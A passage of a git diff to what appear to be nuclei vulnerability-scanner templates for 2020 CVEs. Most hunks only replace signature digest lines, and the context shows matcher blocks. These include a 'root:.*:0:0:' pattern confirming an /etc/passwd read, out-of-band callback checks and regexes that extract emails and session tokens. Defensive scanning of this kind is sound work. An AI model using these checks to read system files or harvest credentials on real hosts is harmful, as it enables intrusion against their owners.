4a0a00473045022100b44c39650dba7c75daabe2fee077ff2200be79fb1c7c6f2760278e18f47dc9bc0220400c4592332407f486b4644593b48f553d65fefdf4c8d7799022d86410b88079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022036ee6c2abe0cae19513f267a94eff61f5998ea99ab09723b203232fe8b84ce1602207c44bb37cf60a356634bae0a5cd0d1adf35f4f7d17d127d491a5e54739e542f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index 3b414f79a5..93fd293708 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100ae2a684b5e05ec99dd3247ebd3073b2e1492e47b631ea52607d7358c3183cfbf022100ece622cb3353e1a1d12f6e1f82cca55fcd1dea2de4dc325b2be673547060969f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001126f54e2cbb18191d3bf7c5021599f58351ff6d803f13102281a58d852b56a022100ee6d137bc69908df9c35facf6fef13e2e43355b4a9e498b9d28bdb1abb91b9ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index eb7209e6aa..bcf9b53fb7 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -65,4 +65,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 4a0a0047304502210090b286f58ae4ddf71281f47e94a6932952a067406a9d9bd4978cee28462a401b02207bc498dd31d9e55e2a847a6900d2537b77406a0208b97997e752e77bbc887dfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d32aad9efc1ac614e1b0434e565c48db2433121cd01aa6dcc72590d6af307e0022100a6406e55e0269b8f6bdb55bec5e733f88ba75da0094de41f1516a7cd5e5ddb2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 6c2a2dc8c5..e168fb6142 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -67,4 +67,4 @@ http: json: - '.data.users.edges[].node.email' part: body -# digest: 4a0a0047304502202e5b9157d7ae60c22f988cf39b691c717b7eb7bc093f14ac0bed7f55162ca0e1022100dd57ee313da7fcab09f97bc272e9b114cce21448f38a7d5e5db130e3df7b1c69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069937af2f53ce38cb14cacd518601e0938381ff12d1c4d6fc653cd972f63b8bf02207502a8e5c17ff4e47df3ccda058fade65e17be55a065c1d8a2f139a611951208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 8766c1a98d..06fa2b5d70 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022053705e9ca543b6da6f715f98721e2301351adfd2835be7aea65337a604285e0d02206e6f0416654910b51302f1f90490a1f60cff9ede2ad03ef280746ac92e2298cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9090d901197920187e7ab283f369a123ade8849650a71f33adc4f9861f6327002210083a1bf1170a90c08243ec337feefcfab7e9cd9a97c457bfb6b4034470216ebc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 2da53f49ae..d8a2200d2e 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ed17b2d49ff9f65ce2c0e4da3dcc47bfb60f16e802588f87c2b5a373ce7c401022100b26845fa81b1cda894e0d93ede5da56f800e98f4783cfdbe5541056c8fea6ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022036c1b1880d80964cb61665741a7f0cf459394f4c88da81e325d31d96d1e4fd03022100c46ed48cd472086fb7a121053309b8ed4410daa16e811d954a937e7cb02f89c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27838.yaml b/http/cves/2020/CVE-2020-27838.yaml index 2862c465a9..9d20ad4ad7 100644 --- a/http/cves/2020/CVE-2020-27838.yaml +++ b/http/cves/2020/CVE-2020-27838.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207895664fdebc5404ce9b5e8146b8dd8f79fea659ab11352290da20fb6d1072500221008a648ae8987c5477eb6f059f6f17812e94cca5d74f45fe63e21768958c8304b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f345884c58dfcc695f374343e8a6e73f1e09258898a3ce7c24bcb6843f171a6022100eccc64ea1c2904bd250a915b963379a89c34634b0c0dfb065bd5de23d1e82342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index a39b13659a..c151fa0e4a 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206bc085b42213b6080bcef49883d25766126822c2a961ff6399087b5325444dc5022100dc09c27ceb99097599ebc2efd75d6c5ab32d9445473235d7866558648db6acc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c46540c9957d1011ea21e3effa33c8b04d5392de89222bed44ab49f4c04edd41022100aa540980b37ae1b1b487be1f61abc608e5b9b561f97f4241fb778f4fd3821090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 4d4e2b0112..1f10953206 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -68,4 +68,4 @@ http: regex: - '"username":"(.*?)"' - '"email":"(.*?)"' -# digest: 4a0a0047304502201fa99af638c35821f64feec1eeb9f72c1e1c3cfabc1e1dca901f87a61a8160290221009c52db7f1fa2f35944f913d927e44976311c3424c70f0958cb7cc313bdc0827a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220035b469fd872bfb4fc272afc2262a9cae37e4361fbc328ffec088bbe4f86c26d022100d87bb521d0a61a1981cf2ef3872167e7be2a887d4079f9feffe3d79bee97a139:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 1aa44b0b12..f9c6e087ff 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100841aeaf06ae18374ceb5b6b14a6b0052577b9ddc7357154d071ed1c63f4cf12402204ae05b8c456dfca7ba53a4bf76033d75de18a70befd86e6437641a1c574c92e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220372db7474247942c7d0764b1c763b5c727e3e87987d9bd554e1afbfda49cdac60220248f54af1255913ff3db878e596b1fa6f29fa735143311f9294d450b1d4e2d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index f2406610f4..7605b70e87 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b39d0c69db45263931714ef86ba9b05e11117b87908d4c8601c8cd0d1c84c72002200a0396346a089b447831c1bc88819562f3c8f36ceb448c88a4fbe9b25608386b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de1b7b1d212460b7f2d9913c6f22ae019e207fdb21d64a3d24a1012088a8ffa602200dbf254cf6ff21e967430c62b76b1531c9fb74694df2fa90115dd6b6a9588d81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 69269b0765..3f5922ad86 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d337b1a5e97c6aa8fb4bbf4b8a91c3a96475868420a2342fce292b449fe7bee1022100f35e3a1d0316e034d7743c0da40e7540645360cb88356751ac2f6855a3d0adf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edfec4a12b3af02d7811d4620ce457124dfcfcf45a1888be61b1420e363a8aeb02204048d0f32fe0dbbbce5dd4012c8a24434473f356db6e9fc14a7d07e64b4b8259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 92fe6d1c2d..1b74ad3d7d 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -73,4 +73,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100993a7e9ecefdc365e401fed26718a5ea7c473d5907d41afb8454c7a705c79365022005c1006a6349b16a557fb1ba985d7021bc8612d94e88e68a04dec75b39a90c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab5aa0c7af986981d5a04ab1b49d404398c397bbbb97d7f396e73df3ab7a42ce02210089eee2575b4064d07c98e6d5a7843594393048936f1b334241c819a9edab8022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index ac3267e8d3..1cfcd15ebf 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b410f0ca39281dc5ddeda5d50abe2a078b267a53057d75e940219cba5187674c022035420ad1aa885d5b61ffc9bfa986feda8ce2adf3ebb1502d4a548c7c9e2b5ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5e999302477baf5839553b04b709404acf586cccc4d51e1c8e981f668f5fa70022100db5bfb3127ba8d499f393bc98a53377847fce5a9589b8c82491b6678a452f16b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index ee66c5cf2e..0efa0c39c4 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f683809abe7e85cb3a1175e77d284384bd3388b4ce037518577b11a1b99573dd02202b7395ca11974b5bdc4ce385c42281ae695c79b19c7d4b4fb12b108a532a8ebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2ae062963e47e20957961aa77ace4d8bbafe9d75ab5f5ba8826088301781c3e022042377ff48be52c3086bef886dfb07d60d720f2969a1452672f62af68c456957d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 4670852c33..92735a0f99 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f30e703a1e893ff7bfaa5878aa52127a107b8cca0b273efd668e19ad5510f28f022100c88a15ae1f91f2812f6b2533dfe5e1d2fe4589a54cb4e571b2be499397edb364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fdb109b607889bf590586e486c0e498d2668476d2c09695b3e2947540b14db8702202840af665dd3c58d0d965dd7dd956ad206372545f4313295757071d7f05b60c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 2a93e5b53b..5220c4143c 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -41,4 +41,4 @@ http: - type: word words: - "poc-testing" # from Base64 decoding payload -# digest: 4b0a004830460221009a8413eb8da32ae540f0c5407408a59e973b61aee402b8f4ba704f472fec5d9a022100956d367efc9e53145c4b07d3bb2b8c5b0bde6f211a12b4e42160e5a4d9783ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089ff436c902f1e94ccad95cbc0d532077ce3f77ca4d5162eb368c0c5cc4be149022001effe7c67f538a9ed6c9fcbf6f978c2035594ed3948eb6cb798088b679f2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index abb36f9cf2..71f63d6b3f 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205aa1631c11bb3beabb3041432b1abbac3a39611e4086b7f525da85e83f48fc0002205cdd1e5fdfa1abe2fd05dd3722e4975de5913462464aaf925db798da8eac1374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100803a7d596134ea339568804f66352008de0bb3a7b2ba127a63bdeba01fca3cef022100d4c06c1ab1762868640769a0a7f3058a01dd0f4857c86b41f85eabf32cce3c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index cac2e5663a..7b128a14e6 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210094d40af2574756b83b158c132f40fc217f5a2f121bbd22db1e63491cae113a24022072c5efda1f80298814f7b07e23bcbfbc7c6ac9fda61fd2eca44f794c45da6f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220666d224b95736b9fbacaedaf1c9faf9b36c13791d08da301d71debcff8d26dd302201b99b13946c6e02e81f4ae56e978d37401e937079864b971e3de0cf5da291035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 6f44e15296..862fe18992 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -78,4 +78,4 @@ http: negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' -# digest: 4b0a00483046022100f9321d3556d4f5143711903a0654ba7e342162a38e8ae25357f182c8009359b4022100b85321eaa826162b86ed187c90f7f9046462fc0837f9636752d1c933e5cab24e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db36ce0fbd97ea0543d0552578a92d9d8cfd0ba6831e29a1f4ad697c486a9a2e02205e6c39cb9e2bbdf6aafea87205d507638193823ca347ff08589342efdd3d0b4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 9389719a65..23a427ed0b 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -54,4 +54,4 @@ http: part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' -# digest: 490a004630440220160db8987fea4ba565870df9c6df758db6fa682ef92ff4c6f6432ad406cfe4e9022079f90c859e2f4df2a98a1c71be7f48d55b3aec47a393cd1b66068046c493e3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047ce0ab78550702b99d05cc5824c960fb3018b9513a971c83bf3f2cd6950b4a0022100e41bc5a6cbbfcad37c73ec926e2f30b351eaa30226e8f4f5f3557ceae4c7a093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 028198850f..5a41384c35 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -66,4 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 4a0a0047304502202d90c2eb84256f04b073de463cfb0402ec212dd03ace14707634a33145e8c7fc022100bb8e7cccf338be987caa5eb7b8f1e1ccdf1448480d085010259f5a8992f1d10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afcb987da6207d78efe5e9ef2616e2ef49c0209efec672e16cb86005ecc73786022035b9c54559a2d0b62cb41985b09f3c0e5677a4b020d5b158420bb85b24523a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index fd3cb4a798..45c217986b 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -65,4 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true -# digest: 490a0046304402203865ecc2276affcc6cf8b20d87931b80f7d4bacf7b3d0aff843d100f41bd350202205425c03e757787dae5fd09c05e990376c87d4493772256ddbbf17b39e67ae53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204fb240641a61cc3706f21c1ae644534846c55fed570255042ca3dbe7d3a48385022053e191c487bee72498117a2cfe47a9611c96ee553dcb14f13f3344ab3bf7f8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index dc772a86f1..dca645c362 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100af70577f267e104380db55128d0e69ec65ffb66e5ec2f85a739c7a661adca17a022100a9dd1bd32a93502c58e0a70e137b8e74b72c3e59922e90aa166862167a52e257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202db13d128754d02765b1a7f15f3aa73ca6c11a2153ad4289f4d950d90d62e12402200254cf28bed25a3f60e192f8d89a010b406ca73e2d1b332b59d9454c730d9beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 4b8c026ee6..ed317e4017 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100c39683f83023c2b9b00bc9874ba82f944bb039fd360bd6fb76fa63047038f42302204fadc0b7522f212e1fc2076ac001586a47839a2ae87152a62ae2d8284f7d39f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb4070ea68439159682a70ab322cd8f571ca4a17e6e19b1c7c0d440d07ede05a022073fb66f634a6f46c7f7b75ec0622a89ffbb71d0bcea551928f731ea5d90f2d22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 3aa25e55f4..636fa12d13 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c1ef38f0b31cc4796a572017f5aa569d3ca8d69d5db61193a22056a2fa4b791102205dd37e9b2682478a3d9d1e057acfd977eae5d1ccfd95e114c39457cc26e9b90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220714d71bab391be9fe7cd5ee141f63fa62d8bf3520f115bd07725edac8b4d65a602210090c629b4fd41a9e5fbdd85e3769e24fef447b6d168c4eaafa9c148bf450a6c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 0c629d5b75..8ae6cf7cc4 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220700626d55f9bb10f64ca0f2d9865a1ed336dd837623298826e4f8959c58b3490022027fa6ac15236194524116e922845bf213e3e8f270aaadc5e3df4d0f7575136cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023bc2f641d20123490efc665405d1718d2cff3508a254af144f2ef63559f64aa02200d4fe3d8d5eef78527ed3c9b671c5b0a5fdac88e52d97c47360f264406f28f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 1099d740c0..7a74c196b8 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc2cf16817aaf1a4a28dcbcf80d5270dbe106cb819d27317b9f79a25d3ed01ad0221008c5b95bbb48cd9e491c881d690b92f104be04131ceca40463cb7f8093460f434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203cd5e86f1662b4147f5f19fd62dfdb0bc83ed2504bebaaabefef50e3bea9c11402200513a5eae3bc7d7041ff0d5170b7cdfee2ee6583b0b68ea4c7da80eb129250ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index d22583dc5b..233d409f76 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 503 -# digest: 490a00463044022041ff8b68e61b4f6bf7f2e768c1fb707a2132aebda523bc60105810042e08a3cf02203541d27a3b548e1ee2d44b7575b006fd03992db6c1028171e66404472cb9d4fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2b3a7881dec91265dbb815d11b7cc197abe77dbac742a65d1e07442f7a16a20022100890b510664fa863fe7eaba488d313de1601c765d5a294f10975ad8c3d0b00dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index b7517b13ca..def54b2abe 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -92,4 +92,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100908ee0877da898c6bd05edac84afbf197f2bd3c652c05de81d682444c91705ac02202f6c10ec85dccbe5220c9db3ccced25575fd4a6c5aa0acd2e6aaa72ddbcdcb63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55589f8e521267651b71c66d1fdf3872aae305a7e04d85a3d25d2996a5fad6a022057127356a3ffc3a7b708082e130a21767fd7a5a448be18de27c1ff42bda802f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index e6b1a0896b..ea6628ca6e 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210086573a79c38b4565b7ea2c75147a37a018cdf1924efe5858b5a38210182561ec0220030416009f9312814258733fe6dafd09719c680ac3f88e15633697e2212e99be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1b656a8b86650677ad1699459442e0b3951652fe28f65fe62cc83e17f156ade02200286cf36327b43c679839a357e1b2c0fa59e13bba2229ed3e6f1e49c9c4ceb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 3365889c1a..c335f6712b 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -51,4 +51,4 @@ http: - 'contains(header, "application/xml")' - 'contains_all(body, "") || contains_all(body, "")' condition: and -# digest: 4a0a00473045022100abe906a6be65b9c025bc7704c029fb1a4dc0cbfce72a7747b5c7a674e768784a02206828d072af3bad693412d0342d807eb460729dbf0e2ad2a45913aa3775953abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022073a86231609dbffc85d93e3b5280b9b623293293aca5ea9fbe48d1c0b4fa8f19022100f360b339dcabb5b2ce8197d6d714cbdeb334e6660c89d69558169a24acb37e96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index d8b877f9af..7fb727238f 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b63228ba9f20bbca3a065519c393892647b7fdde35d3cc5088efd66facabcfcd02210086c3a30e6d9a904622edc028b04502f0e8ed9ad7293b1d28c41b2d477cb3a03b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c507452b0bdcda1404763a92c7393ba03d83152e4a915c1745439c861541aa7d02201f3567c9725dfc51b7747c04fd776eed50abc8175ee0314665266fa0986d2af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index e26cc89c6e..74e115c2fc 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a004730450221008918f007005c4bd18c47d5bd3d0b1d74255d1ec310d880c39358415ae1b283d5022004aa9c23cc199e0a314102ed9d1ce95519a69938084464c7146e9a8b5e8bc434:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae3e68182a0fe05749099a0dcd6127df92935be3d6ce0b55761445b6e9eeb678022050b6c6120d0c0fdf832ba709ece9a662cc6140acfc597ec9eb70d42f643d62ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 23f82f7dd5..d81dc2ef00 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100863add007d17d603e60419b217e08c75160f9acae86361fd0935f1056ba9c4310220387cc7b5f8836dc5d8a20c7ae91fe8f60c3b467b3eab8cf5105e8d64bff9ce47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220675c6f2430b96542714970f75fc8a53d7c820306ca28d740b284f3ba9a3a98ea022100d4ae760aa99a5bfb70f170e71dd1184f424f36a1829091f3ab5e32e68c69938f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7961.yaml b/http/cves/2020/CVE-2020-7961.yaml index 7604f752bd..b558d6d675 100644 --- a/http/cves/2020/CVE-2020-7961.yaml +++ b/http/cves/2020/CVE-2020-7961.yaml @@ -65,4 +65,4 @@ http: - "Microsoft Windows (.*)" - "Distributor ID: (.*)" part: body -# digest: 490a0046304402203b078ca58bc844a1032faebb69311a2fcb83c43a69c3d4283d7e2083fb72ef1b02207a29a7d6998b92d145c1834995eafac96c2f949ccc27157b60dec4a7fd509034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201bd4c9f804d27b1cc0536db5a730dbfc735ec5c05f3db688a1ae0cb617a4dfc3022100c257b5c1ea45f57bc27d876dec52844c88cec1509872f2db5118096c6ec9187a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index fce505e70b..f58bb03ce9 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 